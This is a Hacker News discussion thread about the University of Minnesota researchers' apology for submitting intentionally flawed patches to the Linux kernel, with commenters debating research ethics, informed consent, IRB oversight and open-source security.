The stark difference between white (or even gray) hat and black hack security operations is whether those operations are done with the informed consent of the owners of the system(s) being manipulated. To knowingly and deliberately attempt to manipulate critical infrastructure without the informed consent of the persons responsible for that infrastructure is, in my eyes, clearly unethical black hat hacking. It does not matter how many resources were expended nor does it matter if there was no personal injury or destruction of property. A quiet, relatively uneventful outcome of a black hat operation is nothing more than a dose of good luck.

There are many other circumstances in which this sort of clandestine operation would be obviously unacceptable. Consider if a researcher wished to surreptitiously tamper with vaccine supply chains, automotive or aircraft supply chains, fuel distribution supply chains, chemical manufacturing supply chains, etc. Even if the researcher claimed to have the best of intentions, and had a written plan to carefully back-out or otherwise reverse (or prevent from going to production) the intentionally flawed manipulations or modifications of critical supply chain components, I think very few people would consider the research ethical. There are an enormous number of issues, defects, and mishaps that occur even when a group of people tries their best to implement and maintain critical systems. When a clandestine operator decides to interfere, using whatever justification, then reliability of the system can be expected to suffer.

I do not believe the written apology addresses the underlying problem, which seems to be that the University of Minnesota does not exercise sufficient governance over the researchers in its employ.


This is the most reasonable response in this chain. The number of unintended consequences this "research" could have caused is not quantifiable. This entire episode is shocking, disgusting, and should not be forgiven easily. Actions speak louder than words; this is especially true of apologies. Their words are empty and their actions are nonexistent.


To be fair, you wouldn’t expect these individual researchers to address the governance question. That should come from the University or the department in question.


Indeed, I agree -- the University of Minnesota should shoulder a degree of responsibility. That is even more so the case given that the researchers do not seem to understand (or clearly acknowledge that they understand) the importance of informed consent in both research and security operations, how much reputational damage (for them and the university) can result from unethical research, and the potential for actual harm to occur when research or security operations are conducted in an exclusively clandestine manner.


> the University of Minnesota should shoulder a degree of responsibility.

In fact the argument could be made that there is an ethical duty for every software project, and possibly every individual, to economically boycott the University of Minnesota until they put in place independently-verified changes to their IRB process such that research like this will not be approved again.

If the only "cost" to the university is that one of its researchers has to write a two-faced apology message, then there is nothing stopping future abuses of non-consenting humans. Moreover, with no real punishment meted out, it creates an incentive for other universities to similarly weaken their IRB process to the same level so that they can approve more research projects and remain competitive.


The university should shoulder a huge degree of responsibility. They hired these "researchers". The apology should be coming from those who sponsored and funded the effort. Who cares about any "apology" these "researchers" cobbled together?


This feels like a genuine apology that has been edited to hell by superiors to CYA.


to the folks picking this apart word-by-word: all evidence suggests that two of the signatures are natives of china, and the third of india. it is reasonable to credit them with not being native english speakers.


You can write a good apology even with simple English. And since the researchers clearly have the ability to write papers in major English conferences this doesn’t seem to be a problem. It’s just that the apology doesn't do enough in what harm they have caused and what they are going to do in the future to prevent this harm.


> It’s just that the apology doesn't do enough in what harm they have caused and what they are going to do in the future to prevent this harm.

and that's fair! (also completely unrelated to what i said.)

and has nothing to do with individual word choices that they're being picked apart on, which would be subtle to even non-college educated english speakers.

> And since the researchers clearly have the ability to write papers in major English conferences this doesn’t seem to be a problem.

you're reading different conference papers than i, native-level english is not generally a requirement.


there's no way this didn't go through multiple layers of review


sure there is. this is less important to the university than it is to HN. probably it's been mentioned to the dean of engineering, but i doubt anyone above that knows or would care without half an hour of explanation.

and even the letter was heavily reviewed, the moral thing to do is to give a professor and two grad students leeway in interpretation of their english. (i'll grant that their past leeway in interpretation of their actions, but those aren't the same.)

that doesn't mean it can't be a bad apology, it doesn't mean you have to accept or like it. just, come on, find more substantial issues than their adjectival choices.


They should be expelled. Their department chair should be sending the apology.


This "apology" sounds like social engineering to me. Like they only sent it so they can continue their "research" about how easily they can manipulate the humans reviewing patches for the Linux kernel.


I wonder if the real reason for the patches was to help out certain government agencies with known vulnerabilities. Wild speculation, etc.

Whatever the reasons, this open letter is a joke.


Any apology that doesn't involve retracting the paper is hollow.


Looking forward to the follow-up paper, "Open Source Insecurity: Concealing Vulnerabilities via Hypocrite Apologies"


The apology reads sincere to me even if it could be better, but this is for me why it might be very difficult for the Linux community to recover trust in these guys.

This, and the previous mail that I found pretty insulting too and seemingly written in bad faith but I'd give the benefit of the doubt, one can react badly to a difficult situation.


I am skeptical if they are sincere, because they did not retracted IEEE paper.


'yo, my bad'


Leave them banned.


Will they review incoming patches more carefully going forward?


I'll take the down-vote as a no.... to tell you the truth, I expected more from Linux (self-preservation)


Do not entertain these people's pony show. Do not give them attention. The only way for UMN to be redeemed is for them to expel all the researchers responsible and to fire all the staff tangentially responsible for letting it happen.


Really? I unequivocally think it was unethical research, and thus a mistake.

But what’s the appropriate proportional response?

I honestly have a hard time thinking firing a bunch of people over this would be a good outcome for anyone.

What’s the end goal? I feel like already there’s been enough action to deter this kind of sneaky research in the future.

But at some point you’re just going to scare away the ethical researchers too.


Non-academics get fired for doing unethical things entirely unrelated to their jobs all the time, just to avoid bad publicity.

Determining how to conduct your research ethically is a core part of being a researcher. Basic research into pen testing and security research would have revealed how unethical this study was.

I see firing as completely justifiable given that was a failure in a core part of thier job, that not only caused a public relations mess, but has directly negatively affected other members of the research institute because they have been banned from Kernel contribution.

What further incompetence do you think is required to justify firing this academic?


> Non-academics get fired for doing unethical things entirely unrelated to their jobs all the time, just to avoid bad publicity.

Yes, only if it's unrelated to their jobs. People get hired, not fired, to do unethical research in industry labs. Ethics is breached all the time in industry - rarely even considered. Google tried to make amends, but decided caring too much about ethics was a roadblock to their goals. Tesla markets their "FSD" at the risk of other drivers in the road. The only difference here is that companies have a bigger, better legal and PR team. Comparing the moral compass between academia and industry is absolutely ridiculous.


I wasn't comparing morality of academia and industry, I was making an argument about what are considered a reasonable grounds to calling for someone's firing.

If you are trying to argue that publicly funded research institutions don't think ethics are a core part of research, that seems like something that needs to be addressed.


I still do not get your initial point. You argue that firing would be justifiable in industry, e.g. non-academics, yet we don't hear Google or Facebook [1] scientists getting fired for controversially unethical experiments with poor publicity. The research they did was what they were funded by the government to do. So no, your standards for employment doesn't exist anywhere, industry or academia.

And to be more precise, ethics IS a core part of research. There's an entire subfield dedicated to it in academic labs. Graduate research is very specialized, and researchers do not have the intuition for a difficult topic outside of their expertise. Then there are IRBs, who are most qualified, and yet we see it remains a problem for computing ethics because it's a completely different environment.

We can continue to blame this lab, fine. I agree, huge ethical blunder. But don't forget that this passed IRB, a responsibility of the university, and several phases of anonymous peer review for a major security conference. The security conference that most definitely has reviewers from industry. Was there a lapse of judgement on ALL the scientists and engineers, all with immense experience in their respective fields, who touched this paper and participated through the entire process? Do you seriously believe that? Should they all be fired? Is it really hard to believe that computing ethics is actually not as clear, communicated, and well understood to MANY? There are so many caveats, and not much policies of conduct exist for the breadth of situations.

[1] https://www.theatlantic.com/technology/archive/2014/06/every...


[flagged]


But you have a choice to interact with community or not to interact with an community, difference is that researcher's of “hypocrite commit” did not give such choice to community members, as of today there is overwhelming indication that this researcher's violated basic and fundamental principles of scientific ethical research.


But if I choose to interact with the community, does my choice to present myself, justify any and all abusive actions they may volley at me? Oof coarse not.

The point would ordinarily be a good one, but I think you've misused it.

The Linux kernel community, by your logic, chose to interact with and be open to patches which were not properly vetted.

This framing seems secondary to a seemingly more important point, which is, nobody is fucking perfect.

In LKLM or in UMinn. The light now shines on UMinn, but to me, the feigned horror of LKML at UMinn's transgressions, and the lack of commensurate outrage at the many abusive, toxic and hostile transgressions of the LKML community, presupposes a terrifying "normalization" of abusive behavior within the LKLM community.

By sooch notion, it's safer to interact with the UMinn transgressors, than it is with LKML, who here fail to even once question their own guilt, introspect upon their own created violations of trust and ethics, but heartily condemn the egregious breaches of trust of others.

I'd rather hang with the contrite, or at least hangdog, scallywag, than the quicktongued accusers blind to their own abuses. I'd feel safer there anyhoow.


Context who does what actions is important, you seem to equate university "professionals" research actions to volunteer community actions, it is false to large degree, like comparing apples to orangeries, additionally, consent to be deceived is critical factor. No one in Linux community promises you to be nice[0], and Linux has stepped aside due to his past behavior[1]. To me main point who initiates actions eg. did you willfully performed some actions or you where manipulated to perform some actions.

[0] https://www.kernel.org/doc/html/v4.10/process/code-of-confli...

[1] https://www.newyorker.com/science/elements/after-years-of-ab...


So it's bad for the researchers to deliberately deceive the community because a rule says patches must be good faith but it's not bad for the community to be abusive because there's no rule that says it shouldn't?

so the community can be abusive but no one may abuse the community?

If so, I think that sounds like the basis for bullying culture which perhaps unsurprisingly is what is observed.

I think it's naive for them to assume that all submissions are done in good faith, just as it's naive for participants to assume that all interactions will be nice. It's not the community's fault they were deceived nor is it the participants fault they were abused.

My point is there is an equality. That personal responsibility, ethics and integrity should apply to everyone not just to some labeled group.

What it sounds to me like you're saying is, it's the researchers fault that they deceived us and we have a right to be outraged but it's not our fault that we're abusive to participants and they have no right to be surprised at that. Am i hearing you wrong?

my point i think is to draw attention to the apparently unequal application of these principles of ethics responsibility and integrity. Additionally I'm a little worried that your reluctance to compare your different groups is an attempt to conceal, and justify, a continued unequal application of responsibility ethics and integrity.

That sounds pretty harsh towards you and so I doubt that's actually what you're saying because I don't think you're someone who lacks a moral character like that. I think probably you and I are just misunderstanding what each other is saying. Perhaps.

For instance I don't think either of us believe that bad behavior on either side whether the deception of the researchers or the abusiveness of the community is okay.

I suppose what I'm doing is addressing, or trying to, to contrast the reactions of either side to those things and expose what I see as an unfairness or a double standard or an unequal application. hope that helps you understand what I'm saying. Anyway have a good doi


It is not just bad researchers behavior, it not just unprofessional, it is unacceptable in scientific community, this is an fact, this is where most of outrage is coming from, but at same time similar unethical behavior is legal to a degree[0] in business organization.

No one is arguing that any online community perfect, no organization is perfect, but organization imperfections is not a justification for unethical behavior toward given imperfect organization, to a large degree, there rare case where it is justified, but this not the case here, at all what so ever.

> I think it's naive for them to assume that all submissions are done in good faith.

This is false, there where numerous attempts to submit backdoor to linux kernel, and most in the community are aware that such attempts will never stop, this why also some people criticize that there's study is just another scientific garbage paper.

What is unacceptable in name of science submitting commits in bad faith without informed consent.

What is unacceptable in name of science or otherwise ATTEMPTING an unauthorized penetration testing, this is illegal.

[0] https://www.theatlantic.com/technology/archive/2014/06/every...


Thanks for repluing. I'll trie to make sense of what you're saying and maybe reply you loiter. Have good doi :)


I guess you think that it's okay for the community to be bad in some way but it's not okay for researchers because science ethics should be higher than community ethics.

It's an interesting perspective I guess it comes from the idea that communities are sort of unstructured and it's not as important that they have ethical standards as high as science because science should be more objective and people need to be able to rely on it and trust it. I guess someone could adopt this perspective that seems to excuse community bad behavior while condemning researchers behavior because they just want to get out of any accountability in this particular case. but I'm assuming that you genuinely feel like this and have had this view from before this particular incident.

I simply disagree with this view, I think everyone should behave well or at least held the same standards.

It also seems that you're (or you were when you commented) very angry and hurt by the actions of the researchers and so I guess that you're probably involved in the Linux kind of in a way and felt betrayed by this action or I had some similar experience with scientific people in the past. I wonder how much the opposite of the community is a result that they were successfully deceived and if they had caught these patches and prevented them from being merged and their reaction may be entirely different even if the research is behavior was the same. But I suspect that would still be outrage because probably a lot of people share your view to some extent but the researchers behaviors should be held to a high standard than their own.

Just seems to me that you're not really open to hearing my point of view on this and that's got nothing to do with the merits of my view it's just where you're at. But because it seems like you're not able to hear my view on this or engage with that I just didn't really feel there was a point to continue the discussion. Have a good one


Does the response of the Linux community seem like the response of some corporations when security vulnerabilities are disclosed?

In each case, a vulnerability was disclosed. With Linux being used everywhere you can be sure intelligence services etc are likely sending in bad patches. If the Linux kernel requires only patchers with good intentions, and doesn’t have other means of catching this stuff, we are screwed.


However, when a vulnerability is found, you would expect that the path by which that vulnerability was introduced would be shut off, right? In this case, what they’ve done is to revert all patches from this group, pending further review, just in case something else slipped through.

They’re not sweeping issues under the carpet. They are actively addressing those issues.


Everyone knows that happens. The issue is that these are presumably university funded researchers who intentionally tried to introduce vulnerabilities into the Linux kernel without working with the maintainers. It is fine to perform experiments like this, with permission. I think people are upset because there is a moral, ethical and social obligation expected from academia to not intentionally do shit like this.

They then published a paper and thought that this was acceptable behavior from a research/ethical standpoint.


> I think people are upset because there is a moral, ethical and social obligation expected from academia to not intentionally do shit like this.

OSS security should not rely on ethics and trust. The default assumption should be that malicious actors are using every dirty tactic they can to get their changes accepted, and that someone@something.edu is no more trustworthy than internal.security.agency@china.gov.cn.

Feels like the OSS community got caught with their pants down and is now overreacting.


> the response of some corporations when security vulnerabilities are disclosed

There's a big ethical difference between trying to exploit a piece of commercially produced software, and trying to exploit the time and actions of humans who are producing software which is given away for free.


Also, this wasn’t a vulnerability found in existing code that was disclosed. This was an attempt to introduce several of them in the form of innocent looking commits.

I don’t think the free vs commercial aspect is the main issue here; lots of kernel devs are paid for their work after all...


> Also, this wasn’t a vulnerability found in existing code that was disclosed.

You're right that the OP's analogy breaks down if the researchers were unsuccessful in getting their malicious patches accepted, because then there is arguably no vulnerability to report, and OP said "when security vulnerabilities are disclosed".

Steelmanning that analogy, though, what the researchers were doing was "probing for possible vulnerabilities", which some vendors also complain about, especially if the target is an online service rather than software running locally on the researcher's machine.

In that case, the main flaw in the analogy is still the difference between exploiting software and exploiting humans, so I probably should have focused on that. Nevertheless, there is a small ethical difference in some circumstances between software that is bought and software which is freely downloadable (regardless of the licences involved), since if you paid for something which is defective then you might deserve a refund.


No, not really. For starters, notice how (some) corporations threaten legal action when evidence of a bug is disclosed? And how, here, there was simply a public ban on account of no longer being a good faith participant?


"To err is human, to forgive divine."

So much incredulity and negativity in the comments here. The indignation is totally counter productive.

The apology is fine, folks. Just accept it and move on.


Wouldn't it be better if the kernel had a governance committee and such so that innocent mistakes like this could be smoothed over and the personalities over-reacting on the basis of nothing but years of expertise gained at efforts that benefit the public at large could be dismissed because of their personality problems?

Maybe we can find or make up something unrelated but unsavory about these characters objecting to those pissing in the font of Linux... That's the normal way these things are handled now, right?

(scorching sarcasm intended)




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: